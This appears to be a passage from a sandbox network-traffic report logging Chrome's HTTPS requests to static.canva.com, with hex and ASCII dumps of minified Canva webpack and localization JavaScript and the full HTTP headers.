                                                                                                                                                                                                                                                                    2024-11-20 15:01:31 UTC584INData Raw: 28 73 65 6c 66 5b 22 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 22 5d 20 3d 20 73 65 6c 66 5b 22 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 22 5d 20 7c 7c 20 5b 5d 29 2e 70 75 73 68 28 5b 5b 31 33 38 39 5d 2c 7b 0a 0a 2f 2a 2a 2a 2f 20 38 31 33 31 31 30 3a 0a 66 75 6e 63 74 69 6f 6e 28 5f 2c 20 5f 5f 2c 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 29 20 7b 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6e 5f 78 20 3d 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6e 3b 63 6f 6e 73 74 20 5f 5f 77 65 62 5f 72 65 71 5f 5f 20 3d 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 3b 73 65 6c 66 2e 5f 34 35 66 37 38 35 33 64 63 37 36 36 30 33 37 38 61 30 33 38 39
                                                                                                                                                                                                                                                                    Data Ascii: (self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[1389],{/***/ 813110:function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;self._45f7853dc7660378a0389
                                                                                                                                                                                                                                                                    2024-11-20 15:01:31 UTC1369INData Raw: 3b 76 61 72 20 59 63 3b 76 61 72 20 5a 63 3b 76 61 72 20 62 64 3b 76 61 72 20 51 3b 76 61 72 20 44 3b 76 61 72 20 4e 63 3b 76 61 72 20 4f 3b 76 61 72 20 69 64 3b 76 61 72 20 4f 61 3b 76 61 72 20 4e 61 3b 76 61 72 20 57 3b 76 61 72 20 4c 3b 76 61 72 20 4d 3b 76 61 72 20 63 61 3b 76 61 72 20 53 63 3b 76 61 72 20 75 63 3b 76 61 72 20 74 63 3b 76 61 72 20 6d 63 3b 76 61 72 20 6e 62 3b 76 61 72 20 41 3b 76 61 72 20 61 62 3b 76 61 72 20 4b 61 3b 76 61 72 20 42 3b 76 61 72 20 74 3b 0a 76 61 72 20 62 61 61 2c 68 61 2c 69 61 2c 6b 61 2c 75 61 2c 65 61 61 2c 6a 61 61 2c 69 61 61 2c 68 61 61 2c 67 61 61 2c 6d 61 61 2c 6f 61 61 2c 70 61 61 2c 71 61 61 2c 47 61 2c 49 61 2c 4c 61 2c 4d 61 2c 72 61 61 2c 57 61 2c 76 61 61 2c 75 61 61 2c 52 61 2c 53 61 2c 54 61 2c 56 61
                                                                                                                                                                                                                                                                    Data Ascii: ;var Yc;var Zc;var bd;var Q;var D;var Nc;var O;var id;var Oa;var Na;var W;var L;var M;var ca;var Sc;var uc;var tc;var mc;var nb;var A;var ab;var Ka;var B;var t;var baa,ha,ia,ka,ua,eaa,jaa,iaa,haa,gaa,maa,oaa,paa,qaa,Ga,Ia,La,Ma,raa,Wa,vaa,uaa,Ra,Sa,Ta,Va
                                                                                                                                                                                                                                                                    2024-11-20 15:01:31 UTC1369INData Raw: 6f 6e 28 61 2c 62 2c 2e 2e 2e 63 29 7b 69 66 28 21 61 29 74 68 72 6f 77 20 45 72 72 6f 72 28 6e 75 6c 6c 3d 3d 62 3f 22 69 6e 76 61 6c 69 64 20 61 72 67 75 6d 65 6e 74 22 3a 5f 5f 63 2e 6c 61 28 62 2c 2e 2e 2e 63 29 29 3b 7d 3b 0a 5f 5f 63 2e 6c 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 2e 2e 2e 62 29 7b 6c 65 74 20 63 3d 30 3b 72 65 74 75 72 6e 20 61 2e 72 65 70 6c 61 63 65 28 2f 5c 7b 7d 2f 67 2c 28 29 3d 3e 63 3c 62 2e 6c 65 6e 67 74 68 3f 62 5b 63 2b 2b 5d 3a 22 7b 7d 22 29 7d 3b 5f 5f 63 2e 77 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 2e 2e 2e 63 29 7b 69 66 28 21 61 29 74 68 72 6f 77 20 45 72 72 6f 72 28 6e 75 6c 6c 3d 3d 62 3f 22 69 6e 76 61 6c 69 64 20 73 74 61 74 65 22 3a 5f 5f 63 2e 6c 61 28 62 2c 2e 2e 2e 63 29 29 3b 7d 3b 41 3d 5f 5f 63 2e 41 3d
                                                                                                                                                                                                                                                                    Data Ascii: on(a,b,...c){if(!a)throw Error(null==b?"invalid argument":__c.la(b,...c));};__c.la=function(a,...b){let c=0;return a.replace(/\{}/g,()=>c<b.length?b[c++]:"{}")};__c.w=function(a,b,...c){if(!a)throw Error(null==b?"invalid state":__c.la(b,...c));};A=__c.A=
                                                                                                                                                                                                                                                                    2024-11-20 15:01:31 UTC1369INData Raw: 72 65 70 6c 61 63 65 28 62 2c 22 22 29 2e 72 65 70 6c 61 63 65 28 2f 5c 2b 2f 67 2c 22 20 22 29 29 2c 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 64 2e 72 65 70 6c 61 63 65 28 2f 5c 2b 2f 67 2c 22 20 22 29 29 29 7d 29 3b 72 65 74 75 72 6e 20 63 7d 3b 0a 68 61 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 62 3d 74 79 70 65 6f 66 20 62 3b 73 77 69 74 63 68 28 62 29 7b 63 61 73 65 20 22 75 6e 64 65 66 69 6e 65 64 22 3a 69 66 28 22 22 3d 3d 3d 61 29 72 65 74 75 72 6e 21 30 3b 62 3d 6b 61 61 2e 65 78 65 63 28 61 29 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 62 3f 62 5b 31 5d 3a 79 61 2e 68 61 73 28 61 29 3f 79 61 2e 67 65 74 28 61 29 3a 22 22 21 3d 3d 61 2e 74 72 69 6d 28 29 26 26 4e 75 6d 62 65 72 2e 69 73 46 69 6e 69 74 65 28 4e 75 6d 62 65 72
                                                                                                                                                                                                                                                                    Data Ascii: replace(b,"").replace(/\+/g," ")),decodeURIComponent(d.replace(/\+/g," ")))});return c};haa=function(a,b){b=typeof b;switch(b){case "undefined":if(""===a)return!0;b=kaa.exec(a);return null!=b?b[1]:ya.has(a)?ya.get(a):""!==a.trim()&&Number.isFinite(Number
                                                                                                                                                                                                                                                                    2024-11-20 15:01:31 UTC1369INData Raw: 6c 74 56 61 6c 75 65 2c 64 65 66 61 75 6c 74 56 61 6c 75 65 3a 61 2e 64 65 66 61 75 6c 74 56 61 6c 75 65 2c 57 65 3a 61 2e 57 65 7d 7d 3b 0a 49 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 72 65 74 75 72 6e 7b 74 61 67 3a 63 2c 4d 6f 3a 33 2c 46 66 3a 62 2c 64 65 66 61 75 6c 74 56 61 6c 75 65 3a 61 2e 64 65 66 61 75 6c 74 56 61 6c 75 65 2c 57 65 3a 61 2e 57 65 7d 7d 3b 5f 5f 63 2e 4a 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 72 65 74 75 72 6e 7b 74 61 67 3a 63 2c 4d 6f 3a 34 2c 46 66 3a 62 2c 57 65 3a 61 2e 57 65 7d 7d 3b 4c 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 28 63 2c 64 2c 65 29 3d 3e 7b 63 6f 6e 73 74 20 7b 74 61 67 3a 66 2c 46 66 3a 67 2c 77 74 3a 68 7d 3d 4b 61 28 63 2c 64 2c 65 29 3b 72 65 74 75 72
                                                                                                                                                                                                                                                                    Data Ascii: ltValue,defaultValue:a.defaultValue,We:a.We}};Ia=function(a,b,c){return{tag:c,Mo:3,Ff:b,defaultValue:a.defaultValue,We:a.We}};__c.Ja=function(a,b,c){return{tag:c,Mo:4,Ff:b,We:a.We}};La=function(a,b){return(c,d,e)=>{const {tag:f,Ff:g,wt:h}=Ka(c,d,e);retur
                                                                                                                                                                                                                                                                    2024-11-20 15:01:31 UTC1369INData Raw: 61 73 65 20 35 3a 67 5b 66 2e 74 61 67 5d 3d 7b 2e 2e 2e 66 2c 6e 61 6d 65 3a 6b 7d 3b 62 72 65 61 6b 3b 64 65 66 61 75 6c 74 3a 74 68 72 6f 77 20 6e 65 77 20 42 28 66 29 3b 7d 72 65 74 75 72 6e 7b 74 79 70 65 3a 31 2c 66 69 65 6c 64 73 3a 65 2c 6d 64 61 3a 72 61 61 28 65 2c 62 2e 4c 63 61 29 2c 4e 67 62 3a 67 2c 44 61 62 3a 68 7d 7d 29 3b 63 6c 61 73 73 20 64 7b 73 74 61 74 69 63 20 68 63 62 28 65 3d 7b 7d 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 64 28 65 29 7d 73 74 61 74 69 63 20 73 65 72 69 61 6c 69 7a 65 28 65 29 7b 72 65 74 75 72 6e 20 64 2e 48 37 28 65 2c 5b 5d 29 7d 73 74 61 74 69 63 20 50 69 61 28 65 2c 66 2c 67 29 7b 66 3d 66 2e 63 6f 6e 66 69 67 3b 72 65 74 75 72 6e 22 55 69 6e 74 38 41 72 72 61 79 22 3d 3d 3d 66 2e 57 65 3f 73 61 61 28 65 29 3a
                                                                                                                                                                                                                                                                    Data Ascii: ase 5:g[f.tag]={...f,name:k};break;default:throw new B(f);}return{type:1,fields:e,mda:raa(e,b.Lca),Ngb:g,Dab:h}});class d{static hcb(e={}){return new d(e)}static serialize(e){return d.H7(e,[])}static Pia(e,f,g){f=f.config;return"Uint8Array"===f.We?saa(e):
                                                                                                                                                                                                                                                                    2024-11-20 15:01:31 UTC1369INData Raw: 71 29 3b 66 2e 70 75 73 68 28 60 24 7b 6d 7d 5b 24 7b 71 7d 5d 60 29 3b 70 5b 71 5d 3d 64 2e 75 63 61 28 6e 5b 71 5d 2c 72 2c 66 29 3b 66 2e 70 6f 70 28 29 7d 68 5b 75 5d 3d 70 3b 62 72 65 61 6b 3b 63 61 73 65 20 35 3a 69 66 28 6e 75 6c 6c 3d 3d 6e 29 7b 68 5b 75 5d 3d 6e 65 77 20 4d 61 70 3b 62 72 65 61 6b 7d 65 6c 73 65 20 69 66 28 22 6f 62 6a 65 63 74 22 21 3d 3d 74 79 70 65 6f 66 20 6e 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 60 45 78 70 65 63 74 65 64 20 4d 61 70 20 66 6f 72 20 6b 65 79 20 24 7b 53 61 28 7b 70 71 3a 6b 2c 78 7a 3a 6c 7d 29 7d 2c 20 66 6f 75 6e 64 3a 20 24 7b 56 61 28 6e 29 7d 20 24 7b 54 61 28 66 29 7d 60 29 3b 6b 3d 22 6e 75 6d 62 65 72 22 3d 3d 3d 67 2e 72 45 61 3b 6e 3d 4f 62 6a 65 63 74 2e 65 6e 74 72 69 65
                                                                                                                                                                                                                                                                    Data Ascii: q);f.push(`${m}[${q}]`);p[q]=d.uca(n[q],r,f);f.pop()}h[u]=p;break;case 5:if(null==n){h[u]=new Map;break}else if("object"!==typeof n)throw new TypeError(`Expected Map for key ${Sa({pq:k,xz:l})}, found: ${Va(n)} ${Ta(f)}`);k="number"===g.rEa;n=Object.entrie
                                                                                                                                                                                                                                                                    2024-11-20 15:01:31 UTC1369INData Raw: 7b 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 6c 29 7d 20 24 7b 54 61 28 66 29 7d 60 29 3b 68 5b 70 5d 3d 6e 2e 55 68 61 3b 62 72 65 61 6b 3b 63 61 73 65 20 32 3a 69 66 28 6e 75 6c 6c 21 3d 67 2e 64 65 66 61 75 6c 74 56 61 6c 75 65 26 26 6c 3d 3d 3d 67 2e 64 65 66 61 75 6c 74 56 61 6c 75 65 29 62 72 65 61 6b 3b 66 2e 70 75 73 68 28 70 29 3b 76 61 72 20 6d 3d 64 2e 50 69 61 28 6c 2c 6e 2c 66 29 3b 66 2e 70 6f 70 28 29 3b 69 66 28 21 51 61 28 6d 2c 67 2e 57 65 29 29 74 68 72 6f 77 20 52 61 28 7b 70 71 3a 6b 7d 2c 6c 2c 67 2e 57 65 2c 0a 66 29 3b 68 5b 70 5d 3d 6d 3b 62 72 65 61 6b 3b 63 61 73 65 20 33 3a 69 66 28 6e 75 6c 6c 3d 3d 6c 29 62 72 65 61 6b 3b 66 2e 70 75 73 68 28 70 29 3b 6d 3d 64 2e 50 69 61 28 6c 2c 6e 2c 66 29 3b 66 2e 70 6f 70 28 29 3b 69
                                                                                                                                                                                                                                                                    Data Ascii: {JSON.stringify(l)} ${Ta(f)}`);h[p]=n.Uha;break;case 2:if(null!=g.defaultValue&&l===g.defaultValue)break;f.push(p);var m=d.Pia(l,n,f);f.pop();if(!Qa(m,g.We))throw Ra({pq:k},l,g.We,f);h[p]=m;break;case 3:if(null==l)break;f.push(p);m=d.Pia(l,n,f);f.pop();i
                                                                                                                                                                                                                                                                    2024-11-20 15:01:31 UTC1369INData Raw: 74 6f 72 20 6d 75 73 74 20 62 65 20 46 69 65 6c 64 54 79 70 65 2e 43 4f 4e 53 54 41 4e 54 2c 20 77 61 73 20 24 7b 78 2e 4d 6f 7d 2e 7d 60 29 3b 76 61 72 20 72 3d 57 61 28 22 41 3f 22 2c 78 2e 46 66 2c 63 2e 4c 63 61 29 3b 63 6f 6e 73 74 20 7b 70 72 69 6d 61 72 79 3a 79 2c 63 6f 3a 7a 7d 3d 57 61 28 58 61 28 71 2d 31 29 2c 78 2e 51 34 2c 63 2e 4c 63 61 29 3b 6e 2e 73 65 74 28 71 2c 7b 71 47 62 3a 76 2c 76 61 6c 75 65 3a 78 2e 76 61 6c 75 65 7d 29 3b 6c 2e 73 65 74 28 78 2e 76 61 6c 75 65 2c 76 29 3b 6d 2e 73 65 74 28 79 2c 76 29 3b 7a 26 26 6d 2e 73 65 74 28 7a 2c 76 29 3b 69 66 28 6b 26 26 0a 6b 2e 70 71 21 3d 3d 72 2e 70 72 69 6d 61 72 79 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 60 6f 6e 65 4f 66 20 4a 53 4f 4e 20 6b 65 79 73 20 61
                                                                                                                                                                                                                                                                    Data Ascii: tor must be FieldType.CONSTANT, was ${x.Mo}.}`);var r=Wa("A?",x.Ff,c.Lca);const {primary:y,co:z}=Wa(Xa(q-1),x.Q4,c.Lca);n.set(q,{qGb:v,value:x.value});l.set(x.value,v);m.set(y,v);z&&m.set(z,v);if(k&&k.pq!==r.primary)throw new TypeError(`oneOf JSON keys a


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    13192.168.2.1249731104.16.102.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:31 UTC618OUTGET /web/bc9c3915a07295cb.en.js HTTP/1.1
                                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
                                                                                                                                                                                                                                                                    2024-11-20 15:01:32 UTC1208INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:31 GMT
                                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                                    Content-Length: 641
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e5950da7c1142a1-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                    Age: 48982
                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                                    ETag: "07254cd7d8e452943780b1bae736704b"
                                                                                                                                                                                                                                                                    Expires: Thu, 20 Nov 2025 20:50:17 GMT
                                                                                                                                                                                                                                                                    Last-Modified: Wed, 20 Nov 2024 00:58:22 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Fri, 21 Nov 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                                    x-amz-id-2: 4Q5E63Tr16QZDf6rB5rTJOUxCkEf7IJ8Dh5NSpp5QPsQsuAQA9GDHyvgSeNRRe5/Hr/+iulDPLzpZILgbDpKA5D91801rU1R
                                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                                    x-amz-request-id: GKGW80K5GHDY6Q5M
                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                    x-amz-version-id: YTZ6s2yikn9mBj01X4VLhIxGTypRbUvC
                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                    2024-11-20 15:01:32 UTC350INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 51 79 6c 69 56 37 49 4e 76 67 53 43 37 74 25 32 46 37 57 6d 48 6b 6d 77 6d 62 65 38 48 4c 6a 4f 4a 4b 44 67 47 44 76 58 34 4c 73 77 67 33 43 49 6f 6d 74 65 31 65 47 45 6a 25 32 42 56 6c 42 54 55 61 4c 76 48 4b 52 4b 7a 57 6a 65 6f 54 48 59 6d 53 38 67 55 38 37 34 57 6f 54 48 73 48 25 32 46 57 70 62 4e 75 72 54 6b 41 42 4c 39 79 33 6d 55 72 49 44 6e 4e 4d 75 41 69 34 32 69 42 77 44 78 74 4c 47 76 71 4b 77 6f 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30
                                                                                                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QyliV7INvgSC7t%2F7WmHkmwmbe8HLjOJKDgGDvX4Lswg3CIomte1eGEj%2BVlBTUaLvHKRKzWjeoTHYmS8gU874WoTHsH%2FWpbNurTkABL9y3mUrIDnNMuAi42iBwDxtLGvqKwo%3D"}],"group":"cf-nel","max_age":604800
                                                                                                                                                                                                                                                                    2024-11-20 15:01:32 UTC641INData Raw: 77 69 6e 64 6f 77 5b 27 63 6d 73 67 27 5d 5b 27 61 73 73 65 74 73 27 5d 20 3d 20 77 69 6e 64 6f 77 5b 27 63 6d 73 67 27 5d 5b 27 61 73 73 65 74 73 27 5d 20 7c 7c 20 7b 7d 3b 0a 77 69 6e 64 6f 77 5b 27 63 6d 73 67 27 5d 5b 27 61 73 73 65 74 73 27 5d 5b 22 65 6e 22 5d 20 3d 20 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 77 69 6e 64 6f 77 5b 27 63 6d 73 67 27 5d 5b 27 61 73 73 65 74 73 27 5d 5b 22 65 6e 22 5d 20 7c 7c 20 7b 7d 2c 20 7b 22 31 35 38 22 3a 7b 22 6a 73 22 3a 5b 22 39 66 34 35 32 39 35 65 32 38 38 66 37 62 33 33 2e 73 74 72 69 6e 67 73 2e 6a 73 22 5d 2c 22 63 73 73 22 3a 5b 5d 7d 2c 22 31 30 30 38 22 3a 7b 22 6a 73 22 3a 5b 22 33 35 33 61 33 63 62 61 35 35 62 66 61 30 34 36 2e 73 74 72 69 6e 67 73 2e 6a 73 22 5d 2c 22 63 73 73 22 3a 5b 5d 7d 2c 22
                                                                                                                                                                                                                                                                    Data Ascii: window['cmsg']['assets'] = window['cmsg']['assets'] || {};window['cmsg']['assets']["en"] = Object.assign(window['cmsg']['assets']["en"] || {}, {"158":{"js":["9f45295e288f7b33.strings.js"],"css":[]},"1008":{"js":["353a3cba55bfa046.strings.js"],"css":[]},"


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    14192.168.2.1249732104.16.102.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:31 UTC623OUTGET /web/1c5520ae304c8de4.strings.js HTTP/1.1
                                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
                                                                                                                                                                                                                                                                    2024-11-20 15:01:32 UTC1210INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:32 GMT
                                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                                    Content-Length: 19628
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e5950daebc40cb8-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                    Age: 48983
                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                                    ETag: "c261587fc6da6c6fcd58cc2a945ba8a4"
                                                                                                                                                                                                                                                                    Expires: Thu, 20 Nov 2025 20:50:18 GMT
                                                                                                                                                                                                                                                                    Last-Modified: Wed, 20 Nov 2024 00:58:13 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Fri, 21 Nov 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                                    x-amz-id-2: 6nUn6CvhkHKkQXBJmukAJkMSFxMkFRY0HIK/3SUblpXJDmGRPA2JYGE73bBswYyZFem8ZU198RL7BJ90OPok1gZtuhISNWo7
                                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                                    x-amz-request-id: GKGVZSYDCRNHZ9GS
                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                    x-amz-version-id: Rbp0zw_Czn_plh1TENpsulMAThyjeEIj
                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                    2024-11-20 15:01:32 UTC356INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 63 62 6f 71 4b 66 46 25 32 46 4b 58 30 75 61 43 57 46 39 44 25 32 46 66 35 39 42 25 32 42 59 64 4e 37 6a 51 36 52 74 59 63 59 56 44 66 73 53 4f 48 37 6b 6f 65 79 45 4d 72 25 32 42 35 4b 47 6f 31 71 4f 31 62 50 45 56 43 75 79 76 47 56 54 41 53 6b 6e 5a 67 69 68 53 79 25 32 46 46 41 69 64 37 38 63 6f 4a 50 39 4d 7a 4c 68 64 55 4b 42 42 59 25 32 42 49 71 63 47 32 43 61 42 67 65 61 66 4d 6c 51 6e 7a 4d 62 42 4d 66 75 72 4c 4c 51 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a
                                                                                                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cboqKfF%2FKX0uaCWF9D%2Ff59B%2BYdN7jQ6RtYcYVDfsSOH7koeyEMr%2B5KGo1qO1bPEVCuyvGVTASknZgihSy%2FFAid78coJP9MzLhdUKBBY%2BIqcG2CaBgeafMlQnzMbBMfurLLQ%3D"}],"group":"cf-nel","max_age":
                                                                                                                                                                                                                                                                    2024-11-20 15:01:32 UTC1172INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 63 6f 6e 73 74 20 6d 65 73 73 61 67 65 73 20 3d 20 4a 53 4f 4e 2e 70 61 72 73 65 28 22 7b 5c 22 65 71 34 50 67 41 5c 22 3a 5c 22 44 69 64 6e e2 80 99 74 20 67 65 74 20 74 68 65 20 63 6f 64 65 3f 20 52 65 73 65 6e 64 20 63 6f 64 65 5c 22 2c 5c 22 69 6e 37 67 7a 77 5c 22 3a 5c 22 e2 80 8e 7b 30 7d 20 e2 86 92 20 7b 31 7d 5c 22 2c 5c 22 42 51 6b 4f 43 51 5c 22 3a 5c 22 7b 30 7d 4b 5c 22 2c 5c 22 69 47 41 44 73 67 5c 22 3a 5c 22 53 6b 69 70 20 74 6f 20 73 65 61 72 63 68 5c 22 2c 5c 22 6d 59 44 31 4a 67 5c 22 3a 5c 22 43 6f 6e 66 69 72 6d 5c 22 2c 5c 22 50 46 4f 55 65 77 5c 22 3a 5c 22 43 6f 6e 74 69 6e 75 65 5c 22 2c 5c 22 46 76 59 75 37 51 5c 22 3a 5c 22 54 68 69 73 20 70 61 73 73 77 6f 72 64 20 69 73 20 63 6f 6d
                                                                                                                                                                                                                                                                    Data Ascii: (function() { const messages = JSON.parse("{\"eq4PgA\":\"Didnt get the code? Resend code\",\"in7gzw\":\"{0} {1}\",\"BQkOCQ\":\"{0}K\",\"iGADsg\":\"Skip to search\",\"mYD1Jg\":\"Confirm\",\"PFOUew\":\"Continue\",\"FvYu7Q\":\"This password is com
